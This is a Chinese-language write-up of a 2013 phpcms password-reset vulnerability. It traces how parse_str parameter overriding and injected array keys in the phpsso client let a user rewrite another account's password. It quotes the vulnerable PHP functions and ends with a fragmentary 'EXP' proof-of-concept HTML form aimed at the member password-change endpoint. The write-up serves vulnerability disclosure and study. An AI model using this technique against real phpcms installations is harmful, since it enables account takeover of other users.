phpcms2013年里出现了严重的密码用户漏洞,代码如下:
parse_str(sys_auth($_POST['data'], 'DECODE', $this->applist[$this->appid]['authkey']), $this->data);
在phpsso_server/phpcms/modules/phpsso/classes/phpsso.class.php中。
我们知道parse_str类似将http请求转换成php变量的函数,所以,也像http请求在php的环境下一样,如果提交?a=sss&a=aaa,那么a的结果会是aaa,不是sss。所以我们知道这个函数有一个问题了,如果后面提交一个内容,它会覆盖前面的。也就是username=zhangsan&username=lisi的话,那么用户名就不是zhangsan了。要构造这样的请求,我们还是要回到通行证的client看看,我们有没有这样的机会。其实我们有这样的机会,看看代码,如下:
<<code>public function auth_data($data) {
$s = $sep = '';
foreach($data as $k => $v) {
if(is_array($v)) {
$s2 = $sep2 = '';
foreach($v as $k2 => $v2) {
$s2 .= "$sep2{$k}[$k2]=".$this->_ps_stripslashes($v2);
$sep2 = '&';
}
$s .= $sep.$s2;
} else {
$s .= "$sep$k=".$this->_ps_stripslashes($v);
}
$sep = '&';
}
$auth_s = 'v='.$this->ps_vsersion.'&appid='.APPID.'&data='.urlencode($this->sys_auth($s));
return $auth_s;
}</code>
可能我没说明白,对,传递进来的数组的key是可控的。如果我的key里包含[]&这样三个字符的话,那么我就能重写这样的东西。
举个简单的例子:$a[aaa=a&bbb] = ‘a’;会变成aaa=a&bbb=a明白了么,对,就是通过没有注意到的key,我们可以构造出多余的参数来。
这个时候,我们可以再去看一个函数。就在这个文件内:
<code>public function ps_member_edit($username, $email, $password='', $newpassword='', $uid='', $random='') {
if($email && !$this->_is_email($email)) {
return -4;
}
return $this->_ps_send('edit', array('username'=>$username, 'password'=>$password, 'newpassword'=>$newpassword, 'email'=>$email, 'uid'=>$uid, 'random'=>$random));
}</code>
这是向通行证发了这样一个请求。我们再跟到通信证代码里去看看,就会有所发现。
public function edit() {//能省就省,太长了不是吗?if($this->username) {
//如果提交了用户名,则按照用户名修改记录,反之,按照uid来修改记录。
$res = $this->db->update($data, array('username'=>$this->username));
} else {
file_put_contents('typeb.txt',print_r($data,1).$this->uid);
$res = $this->db->update($data, array('uid'=>$this->uid));
}
好,我们知道了,如果提交了用户名,就会按照用户名来修改记录,不然就按照uid,我们看看函数结构:
public function ps_member_edit($username, $email, $password=”, $newpassword=”, $uid=”, $random=”)
很好,uid要是无法控制的话,后面只剩下一个random了,但是username就在第一个,只要email,password,newpassword,有任何一个可以控制,就可以修改密码了。
我当然找到了:
phpcms9/phpcms/modules/member/index.php
$res = $this->client->ps_member_edit('', $email, $_POST['info']['password'], $_POST['info']['newpassword'], $this->memberinfo['phpssouid'], $this->memberinfo['encrypt']);
然后就没有然后了。
EXP:
<form id=”myform” action=”http://localhost/phpcms9/index.php?m=member&c=index&a=account_manage_password&t=1″ method=”post” name=”myform”>
<table width=”100%” cellspacing=”0″>
<tbody>
<tr>
<th width=”80″>邮箱:</th>
</tr>
<tr>
<th width=”80″>原密码:</th>
新密码: </tr>
</tbody>
</table>
</form>